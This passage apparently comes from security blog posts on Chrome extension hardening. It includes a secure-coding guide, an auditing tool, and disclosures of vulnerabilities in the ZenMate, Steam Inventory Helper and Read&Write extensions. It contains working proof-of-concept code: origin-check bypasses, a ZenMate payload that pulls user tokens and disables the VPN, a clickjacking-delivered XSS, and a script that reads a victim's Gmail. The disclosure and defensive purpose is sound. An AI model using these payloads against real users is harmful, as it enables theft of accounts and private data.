    if( keyevent.isTrusted ) {
        document.getElementById( "last_keypress_div" ).innerHTML = keyevent.code;
    }
});

Now an attacker cannot send completely mangled synthetic events to us. All events we process will have to be triggered originally by the end user. While the isTrusted property is not commonly used, it is essential in the case of Content Scripts processing web page events.

This example is pretty contrived because if you have an attacker creating arbitrary events on your page you are likely already owned at the web page level, so an XSS in the web page caused by this is circular. A real world example of this would be the Background Page doing something unsafe with the event data retrieved by a Content Script, but for simplicity-sake we’ve kept it to just a demonstration of JavaScript event spoofing in a regular webpage.

Messages Sent From Web Pages Cannot Be Trusted

Yet another common pattern in Chrome extensions is the use of JavaScript’s postMessage() for message passing to call privileged Chrome extension APIs in the Background Page. Often a message is issued from a web page, received by the Content Script via an event listener, and is then relayed to the Background Page to call some privileged Chrome APIs. This creates a direct bridge where any web page can make use of privileged Chrome extension APIs, and results in some nasty things if the developer is not checking the origin of the message.

Often, even if a developer is checking the origin of the received messages, they will implement a check similar to the following:

window.addEventListener( "message", function( received_message ) {
    // Check to make sure this a sub-domain of our site
    if( received_message.origin.indexOf( ".trusteddomain.com" ) !== -1 ) {
        process_message( received_message );
    }
}, false);

Or, if they are a fan of regex they will do something similar to the below examples:

received_message.match(/https:\/\/www\.trusteddomain\.com/i)
...
received_message.match(/https?:\/\/www.trusteddomain.com$/i)
...

Sadly all of these checks are bypassable, the following demonstrates bypasses for each:

// Bypassed with https://a.trusteddomain.com.attacker.com
received_message.origin.indexOf( ".trusteddomain.com" ) !== -1

// Also bypassed with https://a.trusteddomain.com.attacker.com
received_message.match(/https?:\/\/www\.trusteddomain\.com/i)

// Bypassed with https://wwwatrusteddomain.com
received_message.match(/https?:\/\/www.trusteddomain.com$/i)

This is almost certainly because the origin property of the received message is a string of the site’s origin and not an object with parsed-out origin parts. Parsing URLs in general is well known to be pitfall-prone problem, so handing everyone a string and asking them to check it themselves is naturally going to lend itself to these issues. Perhaps in future web standards a native origin verification function could be added to give developers a more assured way to validate this behavior.

To safely validate origins of messages it is recommended to have a static list of trustable HTTPS origins. Ensuring HTTPS is important because without it, an extension can be vulnerable to man in the middle attacks. The following is an example of secure code to do this:

var trusted_origins = [
    "https://trusteddomain.com",
    "https://www.trusteddomain.com",
    "https://extension.trusteddomain.com"
];

if( trusted_origins.includes( received_message.origin ) ) {
    // We can trust this message came from the right place
    process_message( received_message );
}

This keeps the surface area small and leaves little room for error when checking to see if an origin is trusted.

Of course, many developers would prefer to simply whitelist all subdomains of their main domain so that they will not have to change the source code to add new hostnames. While I’d recommend against doing this (for reasons discussed below), safe code for doing so can be seen below:

// Pull out the message origin
var message_origin = received_message.origin;

// Specify your trusted domain
var base_domain = "trusteddomain.com";

if( message_origin.startsWith( "https://" ) && ( message_origin.edsWith( "."[b] + base_domain ) || message_origin === "https://" + base_domain ) ) {
    // Message is HTTPS and a sub-domain, trust it.
    process_message( received_message );
}

The above code is straightforward, it simply checks to ensure that an origin is both HTTPS and either a sub-domain of the trusted base-domain, or just the base-domain itself.

One final, but equally important thing to remember to check is the message event source. Inbound messages have a source property which is a reference to the window which sent it. Most of the time a Content Script is making the assumption that the sender of the message is the same window which the Content Script is running on. For this reason it’s important that the following simple check be added as well:

// Check to make sure the sender is the window we expect.
// If it’s not, return immediately.
if( received_message.source !== window ) {
    return;
}

The above check ensures that the window which sent the message is the same one the Content Script is running on. If it is not, the script returns instantly instead of processing the message. A common mistake developers will make is to not check the source of the message and perform DOM manipulations based off the content of the received message. This means that another page could potentially send a malicious message to a target site to force an insecure DOM operation via Content Script resulting in XSS. While there are edge cases where you wouldn’t want the same source window as the Content Script, the vast majority should implement this simple check.

The King Shouldn’t Live Outside the Castle Walls

Now that I’ve shown you safe code for ensuring that something is a subdomain of your trusted domain, I want to take a moment to discuss surface area.

Often enough, you will see extensions that allow privileged Chrome extension API calls only from subdomains of a domain owned by the Chrome extension owner. This pattern is often seen as useful for developers because they can more easily change their website’s code to make different calls to the Chrome extension’s APIs instead of having to update the extension itself. Once you’re operating on this idea, often the next one is to simply allow privileged API calls from any subdomain of your trusted base domain.

This behavior is also easy to fall into when using the externally_connectable directive. This directive states which origins can send messages to the extension’s Background Page. Even in the official documentation the example provided is the following which allows for all subdomains of a base domain over either HTTP or HTTPS to send messages:

"externally_connectable": {
  "matches": ["*://*.example.com/*"]
}

All of that seems very reasonable from a development point of view. However, what the developer has effectively done is move the barrier of security from the strongly-locked-down Background Page, to any sub-domain of their domain. This means that an attacker could completely hijack these privileged calls if they have arbitrary JavaScript execution on any subdomain of the trusted domain. There are a number of ways that this can occur:

It takes only one slip up in any of these subdomains to result in the Chrome extension becoming vulnerable. Compare this to all of the protections such as CSP, and web navigation blocking given to Chrome extension Background Pages and the stark contrast becomes clear. Why play a game rigged in the attacker’s favor?

A good example of this problem can be seen in a critical vulnerability I found in the ZenMate VPN Chrome extension (at the time of this writing it has ~3.5 million users). The following is an excerpt from their (previously) vulnerable manifest.json:

...trimmed for brevity...
{
  "js": [
    "scripts/page_api.js"
  ],
  "matches": [
    "*://*.zenmate.com/*",
    "*://*.zenmate.ae/*",
    "*://*.zenmate.ma/*",
    "*://*.zenmate.dk/*",
    "*://*.zenmate.at/*",
    "*://*.zenmate.ch/*",
    "*://*.zenmate.de/*",
    "*://*.zenmate.li/*",
    "*://*.zenmate.ca/*",
    "*://*.zenmate.co.uk/*",
    "*://*.zenmate.ie/*",
    "*://*.zenmate.co.nz/*",
    "*://*.zenmate.com.ar/*",
    "*://*.zenmate.cl/*",
    "*://*.zenmate.co/*",
    "*://*.zenmate.es/*",
    "*://*.zenmate.mx/*",
    "*://*.zenmate.com.pa/*",
    "*://*.zenmate.com.pe/*",
    "*://*.zenmate.com.ve/*",
    "*://*.zenmate.fi/*",
    "*://*.zenmate.fr/*",
    "*://*.zenmate.co.il/*",
    "*://*.zenmate.in/*",
    "*://*.zenmate.hu/*",
    "*://*.zenmate.co.id/*",
    "*://*.zenmate.is/*",
    "*://*.zenmate.it/*",
    "*://*.zenmate.jp/*",
    "*://*.zenmate.kr/*",
    "*://*.zenmate.lu/*",
    "*://*.zenmate.lt/*",
    "*://*.zenmate.lv/*",
    "*://*.zenmate.my/*",
    "*://*.zenmate.be/*",
    "*://*.zenmate.nl/*",
    "*://*.zenmate.pl/*",
    "*://*.zenmate.com.br/*",
    "*://*.zenmate.pt/*",
    "*://*.zenmate.ro/*",
    "*://*.zenmate.com.ru/*",
    "*://*.zenmate.se/*",
    "*://*.zenmate.sg/*",
    "*://*.zenmate.com.ph/*",
    "*://*.zenmate.com.tr/*",
    "*://*.zenmate.pk/*",
    "*://*.zenmate.vn/*",
    "*://*.zenmate.hk/*"
  ],
  "run_at": "document_start"
}
...trimmed for brevity...

The Content Script page_api.js allows for privileged API calls to the extension in order to do things like retrieve user information, whitelist sites so they’re not proxied, and toggling whether or not the user is connected to the VPN. Given the above list of dozens of domains, there is a lot of surface area to potentially exploit. In order to hijack this extension we’d need an XSS on any sub-domain, on any of these dozens of domains.

However, it turns out we didn’t need even that. One of the domains, zenmate.li, was expired and open for registration. After buying it and setting up a website for it, all that was needed to extract user information was to run the following payload on this whitelisted domain:

// Make call to Content Script to get all user data
__zm.getData(function(results) {
    console.log(
        results
    );
});

// Turn off VPN
__zm.toggle(false);

With this payload we can retrieve all the user’s information (their authentication tokens, email address, etc), and can completely de-anonymize them effectively bypassing all the protections of the extension. While the vendor’s response was prompt and this issue is now fixed this demonstrates exactly the type of critical problems that can occur when you move control of the extension outward to multiple websites and expand the surface area. For a full write-up please see this post which goes further into details.

Generally Sane Parsing of URLs

There are other situations where a developer might find themselves parsing a given URL to see if it’s from a trustable origin. This can occur through usage of APIs such as chrome.tabs.get() which returns a Tab object full of metadata on the queried tab. Developers will often attempt to parse the url property of this object via a regular expression to see if it’s a site that they trust. As we saw before, parsing URLs is tricky business and is very hard to get right. The core of this problem is that the code you write to pull out a URL’s origin could differ from how Chrome does it internally, resulting in a bypass.

A clean way to sanely pull an origin out of a given URL is to use the URL() constructor:

// Input URL
var input_url = "https://trusted-domain.com/example-url/?red=blue#yellow";

// Safely check to see if a URL matches a target origin
function check_origin_match( input_url, target_origin ) {
    var parsed_url = new URL(
        input_url
    );
    return ( parsed_url.origin === target_origin );
}

if( check_origin_match( input_url, "https://trusted-domain.com" ) ) {
    // URL is from a trusted origin!
} else {
    // Not from a trusted origin.
}

The above code is special because it shifts the work to Chrome’s URL parser to retrieve the origin from a given URL. This ensures that your code and Chrome’s code agree on the actual origin of a given URL. Instead of using the check_origin_match() function above, you can just pass a URL to the URL constructor yourself and check the origin property using some of the provided code above. This should address cases where you need to securely check a URL’s origin due to it not being already parsed out for you. The final URL object also contains useful parsed-out fields for hash, hostname, URL path, parameters, and more.

Clickjacking & Careful Use of web_accessible_resources

The web_accessible_resources directive denotes which resources such as extension pages, images, and JavaScript can be embedded by arbitrary websites. As outlined earlier, by default, arbitrary web pages cannot embed extension pages in iframes, or source them via script or stylesheet tags. Example usage of this directive can be seen below:

{
  ...trimmed for brevity...
  "web_accessible_resources": [
    "images/*.png",
    "style/double-rainbow.css",
    "script/double-rainbow.js",
    "script/main.js",
    "templates/*"
  ],
  ...trimmed for brevity...
}

As can be seen from the above example, not only can you specify specific resources but you can also wildcard a folder of resources as well. However, occasionally developers will experience an issue with Chrome blocking their ability to embed extension resources and will do something like the following:

{
  ...trimmed for brevity...
  "web_accessible_resources": [
    "*",
  ],
  ...trimmed for brevity...
}

This is a completely valid policy and essentially means that all Chrome extension resources can now be embedded in third party websites. The problem is that this turns into a clickjacking vulnerability when your extension contains pages which perform privileged actions and also fall under your web_accessible_resources policy. For a good example of an extension vulnerability caused by clickjacking see this post about a UXSS in Steam Inventory Helper.

Automating the Auditing Process With tarnish

Due to the unique structure of Chrome extensions, I decided to write a service to help developers and security researchers audit Chrome extensions for security vulnerabilities. This tool, which I’ve named tarnish, has the following features:

  • Pulls any Chrome extension from a provided Chrome webstore link.
  • manifest.json viewer: simply displays a JSON-prettified version of the extension’s manifest.
  • Fingerprint Analysis: Detection of web_accessible_resources and automatic generation of Chrome extension fingerprinting JavaScript.
  • Potential Clickjacking Analysis: Detection of extension HTML pages with the web_accessible_resources directive set. These are potentially vulnerable to clickjacking depending on the purpose of the pages.
  • Permission Warning(s) viewer: which shows a list of all the Chrome permission prompt warnings which will be displayed upon a user attempting to install the extension.
  • Dangerous Function(s): shows the location of dangerous functions which could potentially be exploited by an attacker (e.g. functions such as innerHTML, chrome.tabs.executeScript).
  • Entry Point(s): shows where the extension takes in user/external input. This is useful for understanding an extension’s surface area and looking for potential points to send maliciously-crafted data to the extension.
  • Both the Dangerous Function(s) and Entry Point(s) scanners have the following for their generated alerts:
    • Relevant code snippet and line that caused the alert.
    • Description of the issue.
    • A “View File” button to view the full source file containing the code.
    • The path of the alerted file.
    • The full Chrome extension URI of the alerted file.
    • The type of file it is, such as a Background Page script, Content Script, Browser Action, etc.
    • If the vulnerable line is in a JavaScript file, the paths of all of the pages where it is included as well as these page’s type, and web_accessible_resource status.
  • Content Security Policy (CSP) analyzer and bypass checker: This will point out weaknesses in your extension’s CSP and will also illuminate any potential ways to bypass your CSP due to whitelisted CDNs, etc.
  • Known Vulnerable Libraries: This uses Retire.js to check for any usage of known-vulnerable JavaScript libraries.
  • Download extension and formatted versions.
    • Download the original extension.
    • Download a beautified version of the extension (auto prettified HTML and JavaScript).
  • Automatic caching of scan results, running an extension scan will take a good amount of time the first time you run it. However the second time, assuming the extension hasn’t been updated, will be almost instant due to the results being cached.
  • Linkable Report URLs, easily link someone else to an extension report generated by tarnish.

All of these features have been created to automate annoying repetitive actions I’ve had to undertake while auditing various Chrome extensions. If you have suggestions or bugs in any of the functionality of the service, please feel free to reach out to me and I’ll look into it.

Click here to try out the tarnish Chrome extension analyzer.

 

Summary

The “Steam Inventory Helper” Chrome extension version 1.13.6 suffered from both a DOM-based Cross-site Scripting (XSS) and a clickjacking vulnerability. By combining these vulnerabilities it is possible to gain JavaScript code execution in the highly-privileged context of the extension’s background page. Due to the extension declaring the “” permission, this vulnerability can be exploited to hijack all sites that the victim is authenticated to. For example, if a user is authenticated to their bank, Steam, Gmail, and Facebook, this vulnerability could be used to access all of those accounts. This vulnerability is fixed in the latest version of the extension and all users should update (if Chrome has not done so for them automatically).

The core of this issue is due to a DOM-based Cross-site Scripting (XSS) in “/html/bookmarks.html” which is frameable from arbitrary web pages due to a the “web_accessible_resources” directive specifying this resource. By submitting an entry with the name of an XSS payload this page can be exploited to gain JavaScript execution in the context of the extension. Since a user is unlikely to paste an XSS payload into this page of their own will, the clickjacking vulnerability is used to redress the UI of the application to trick the victim into exploiting the issue. A pretext of a “Bot Detection” page is used to get the victim to paste the payload (hidden inside of a larger “verification code”) and click the “Add” button to exploit the issue. The full proof-of-concept can be seen in the video below.

Proof-of-Concept

Technical Details

The first vulnerability is the DOM-based Cross-site Scripting (XSS) vulnerability in “/html/bookmarks.html”, the following is the vulnerable JavaScript from the included “bookmarks.js”:

$('#btAdd').click(function() {
    var btname = $('#txtName').val();
    if ($('.custom-button .name').filter(function() {
        return $(this).text() === btname;
    }).length) return false;

    var span = $('<span class="custom-button">');
    span.html('<span class="name">' + btname + '</span>');
    span.append('<a href="javascript:void(0)" title="remove">x</a>');
    span.attr('title', btname);
    span.data('id', (new Date().getTime()));
    $('div.custom-buttons .existing').append(span);
    save_options();
});

The above JavaScript takes the value of the “txtName” text box and uses string concatenation to build HTML which is appended to the DOM via jQuery’s “append()” function. This is the core of the XSS vulnerability since user input should always be contextually escaped to prevent injection of arbitrary markup. Normally, Chrome extension Content Security Policy (CSP) should prevent this vulnerability from being exploited. However, due to the loosening of this policy via ‘unsafe-eval’ and the use of jQuery’s DOM APIs, this was still able to be exploited. This is due to much of jQuery’s DOM APIs making use of “globalEval()”, which automatically passes scripts to “eval()” upon appending to the DOM.

While this is a serious vulnerability, on its own exploitation is fairly limited due to the user-interaction required to exploit it. The victim would have to open the page, paste a Cross-site Scripting (XSS) payload into the field, and click the “Add” button to exploit it.

In order to better weaponize this vulnerability we make use of a separate vulnerability (clickjacking) in order to bolster the attack.

The following is an excerpt from the Chrome extension’s manifest:

...trimmed for brevity...
"web_accessible_resources": [
    "_locales/*",
    "bundle/*",
    "dist/*",
    "assets/*",
    "font/*",
    "html/bookmarks.html",
    "css/*.css",
    "js/*.js",
    "js/jquery/*.js",
    "js/lang/*"
],
...trimmed for brevity...

The above section demonstrates that the extension casts a wide net with its “web_accessible_resources” policy. By default Chrome extensions prevent framing and navigation to Chrome extension pages from arbitrary web pages as an extra security measure. This directive loosens this restriction, allowing for third party pages to navigate to and frame the specified resources. Much of the extension’s privileged UI pages are specified under this directive, rendering the extension vulnerable to clickjacking.

As can also be seen in the excerpt, the “/html/bookmarks.html” page is also able to be framed and thus exploited via clickjacking. We abuse this to iframe this page in our web page, and overlay the frame with DOM elements to redress the layout. This makes it so that the victim is unaware that they are actually interacting with the extension below. The following animation demonstrates this effect:

clickjacking-animation-example

The above example demonstrates how we redress the UI to trick the victim. The “Bot Detection” page provides a button to click to copy the “Verification code” to the victim’s clipboard. This “verification code” is actually a Cross-site Scripting (XSS) payload inside of a large amount of random hex bytes. This hides the payload from the victim’s view while they paste it into the extension’s textbox, leading the victim into believing they are just copying and pasting a long random code. Finally, when the victim clicks the “Add” button, the XSS fires.

Root Cause & Further Thoughts

There are two notable points of interest in this exploit. The first is that we were able to achieve DOM-XSS even with a fairly tight Content Security Policy (CSP) of the following:

"script-src 'self' 'unsafe-eval'; object-src 'self'"

While this CSP is fairly strong, it crumbles when combined with unsafe usage of jQuery’s DOM manipulation APIs such as “.html()” and “.append()”. This is something to look for when auditing Chrome extensions (and when writing them), if you make use of jQuery and have ‘unsafe-eval’ in your CSP – you’re playing with fire.

The second interesting point is that clickjacking is a valid vulnerability which can absolutely affect Chrome extensions. All that is required is that a privileged Chrome extension UI page be exposed via the “web_accessible_resources” directive. After taking a look at many of the popular extensions on the Chrome store it seems many of them fall victim this simple mistake. Most of the time this is due to accidental overscoping via wildcarding of a privileged extension HTML page. This not only opens up extensions to attacks like clickjacking but can result in other vulnerabilities if the extension takes in user input from “location.hash”, “postMessage”, etc. The default protection given to Chrome extensions via the navigation sandboxing should not be taken for granted by the extension developers.

Timeline

  • June 4: Disclosed to SIH TechSupport (owners of extension)
  • June 6: Vendor confirms receipt of issue, states they will look into it and fix it.
  • June 7: Vendor updates extension to fix the vulnerabilities.

read-and-write-chromes-tore

Summary

Due to a lack of proper origin checks in the message passing from regular web pages, any arbitrary web page is able to call privileged background page APIs for the Read&Write Chrome extension (vulnerable version 1.8.0.139). Many of these APIs allow for dangerous actions which are not meant to be callable by arbitrary web pages on the internet. For example, the background API call with a method name of “thGetVoices” which allows for providing an arbitrary URL which will be retrieved by the extension and the response returned via “postMessage”. By abusing this call an attacker can hijack the extension to read data from other websites using the victim’s authenticated sessions. As a proof of concept, I’ve created an exploit which, upon being viewed with the Read&Write extension installed, will steal and display all of the user’s emails. This is of course not a vulnerability in Gmail, but is an example of the exploitation that can occur using this vulnerability. See the video proof-of-concept below for a demonstration of the issue.

texthelp, the company who created he extension, patched quickly and released a fix the next business day (nice work!). For this reason the latest version of the extension is no longer vulnerable to this issue. They also showed real interest and care about remediating further issues in the extension and stated they’d be further hardening the codebase.

Technical Description

The Read&Write Chrome extension makes use of the Content Script “inject.js” to inject a custom toolbar into various online document pages such as Google Docs. This Content Script is injected into all HTTP and HTTPS origins by default. This is demonstrated by the following excerpt from the extension’s manifest:

...trimmed for brevity...
  "content_scripts": [
    {
      "matches": [ "https://*/*", "http://*/*" ],
      "js": [ "inject.js" ],
      "run_at": "document_idle",
      "all_frames": true
    }
  ],
...trimmed for brevity...

Inside of the “inject.js” file there is an event listener for any messages sent via postMessage by a web page which the Content Script is injected into:

window.addEventListener("message", this.onMessage)

This calls the “this.onMessage” function upon any postMessage being sent to the web page’s window. The following is the code for this function:

function onMessage() {
    void 0 != event.source && void 0 != event.data && event.source == window && "1757FROM_PAGERW4G" == event.data.type && ("connect" == event.data.command ? chrome.extension.sendRequest(event.data, onRequest) : "ejectBar" == event.data.command ? ejectBar() : "th-closeBar" == event.data.command ? chrome.storage.sync.set({
        enabledRW4GC: !1
    }) : chrome.extension.sendRequest(event.data, function(e) {
        window.postMessage(e, "*")
    }))
}

In the above code snippet, it can be seen that the function will pass along all received postMessage messages to the background page via “chrome.extension.sendRequest”. Additionally, the responses to these messages will be passed back to the “onMessage” function and then passed back to the web page. This essentially constructs a proxy which allows regular web pages to send messages to the Read&Write background page.

Read&Write has a number of background pages which can be seen in the excerpt from the extension’s manifest:

...trimmed for brevity...
"background": {
  "scripts": [
    "assets/google-analytics-bundle.js",
    "assets/moment.js",
    "assets/thFamily3.js",
    "assets/thHashing.js",
    "assets/identity.js",
    "assets/socketmanager.js",
    "assets/thFunctionManager.js",
    "assets/equatio-latex-extractor.js",
    "assets/background.js",
    "assets/xmlIncludes/linq.js",
    "assets/xmlIncludes/jszip.js",
    "assets/xmlIncludes/jszip-load.js",
    "assets/xmlIncludes/jszip-deflate.js",
    "assets/xmlIncludes/jszip-inflate.js",
    "assets/xmlIncludes/ltxml.js",
    "assets/xmlIncludes/ltxml-extensions.js",
    "assets/xmlIncludes/testxml.js"
  ]
},
...trimmed for brevity...

While there are many background pages which listen for messages (and many functions to call via these messages) we’ll focus on an immediately exploitable example. The following is an excerpt from the file “background.js”:

...trimmed for brevity...
chrome.extension.onRequest.addListener(function(e, t, o) {
...trimmed for brevity...
if ("thGetVoices" === e.method && "1757FROM_PAGERW4G" == e.type) {
    if (g_voices.length > 0 && "true" !== e.payload.refresh) return void o({
        method: "thGetVoices",
        type: "1757FROM_BGRW4G",
        payload: {
            response: g_voices
        }
    });
    var c = new XMLHttpRequest;
    c.open("GET", e.payload.url, !0), c.onreadystatechange = function() {
        4 == this.readyState && 200 == this.status && (g_voices = this.responseText.toString(), o({
            method: "thGetVoices",
            type: "1757FROM_BGRW4G",
            payload: {
                response: g_voices
            }
        }))
    }, c.send()
}
...trimmed for brevity...

The above snippet shows that upon the “chrome.extension.onRequest” listener being fired with an event with its “method” set to “thGetVoices” and the “type” set to “1757FROM_PAGERW4G” the snippet will be executed. If the event’s “payload.refresh” is set to the string “true” then the XMLHTTPRequest will fire with a GET to the URL specified in “payload.url”. Upon the XMLHTTPRequest completing with a status code of 200 a response message will be generated with the request’s responseText.

By abusing this call we can send a message to the background page with an arbitrary URL which will be replied to with the HTTP response body. This request will execute using the victim’s cookies and thus will allow a payload on any arbitrary web page to steal content from other web origins. The following payload is an example proof-of-concept which exploits this:

function exploit_get(input_url) {
    return new Promise(function(resolve, reject) {
        var delete_callback = false;
        var event_listener_callback = function(event) {
            if ("data" in event && event.data.payload.response) {
                window.removeEventListener("message", event_listener_callback, false);
                resolve(event.data.payload.response);
            }
        };
        window.addEventListener("message", event_listener_callback, false);
        window.postMessage({
            type: "1757FROM_PAGERW4G",
            "method": "thGetVoices",
            "payload": {
                "refresh": "true",
                "url": input_url
            }
        }, "*");
    });
}
setTimeout(function() {
    exploit_get("https://mail.google.com/mail/u/0/h/").then(function(response_body) {
        alert("Gmail emails have been stolen!");
        alert(response_body);
    });
}, 1000);

The above exploit code shows that cross-origin responses can be read via this vulnerability. In this case the endpoint for Gmail’s “Simple HTML” version is provided. The above payload can be hosted on any website and it will be able to read the emails of someone who is logged in to Gmail. This is done by issuing a message via postMessage with the appropriate payload set and adding an event listener for the response message. By chaining JavaScript Promises returned via the “exploit_get()” function we can steal data from any site that the user is authenticated to (assuming it can be accessed via HTTP GET without any special headers).

While the above example references the “thGetVoices” background method call, this is merely one of the vulnerabilities which occurs from calling these background page APIs. In addition to using this call, some other examples of vulnerabilities which can be exploited are the following:

  • “thExtBGAjaxRequest” which an attacker can use to do an arbitrary POST request of type “application/x-www-form-urlencoded;charset=UTF-8” with parameters and read the response body.
  • “OpenTab” which allows an attacker to open an endless amount of tabs to arbitrary locations normally restricted to web pages.

Proof-of-Concept Video

Root Cause & Remediation Thoughts

This vulnerability demonstrates a common security pitfall which often occurs with extensions. In order to be more flexible with the Chrome extension API usage many extensions will build a bridge to allow calling the background page from the regular web context. Many Chrome extension developers forget to validate the origin of messages in order to prevent arbitrary sites from calling potentially sensitive functionality. In this case, the ideal action would likely be to move most of the logic into the Content Script to be called not by postMessage but instead by event listeners triggered with the isTrusted property validated. This way it can be ensured that all calls are triggered by user actions instead of forged by an attacker.

Timeline

  • June 3rd (Late Friday night): Reported vulnerability.
  • June 3rd: Confirmed receipt of issue, confirms will take a look Monday.
  • June 4th (Monday): Patch released for vulnerability. I was actually incorrect, the development team is based in Ireland (so they received it on Saturday) and fixed the issue by Sunday. The patch was only released early Monday morning (6:00am EST) due to a strict QA process to make sure everything was up to snuff before releasing. There was no delay between receiving the issue and immediately working on a fix for it :). So the vendor response is actually more impressive than previously stated. </ul>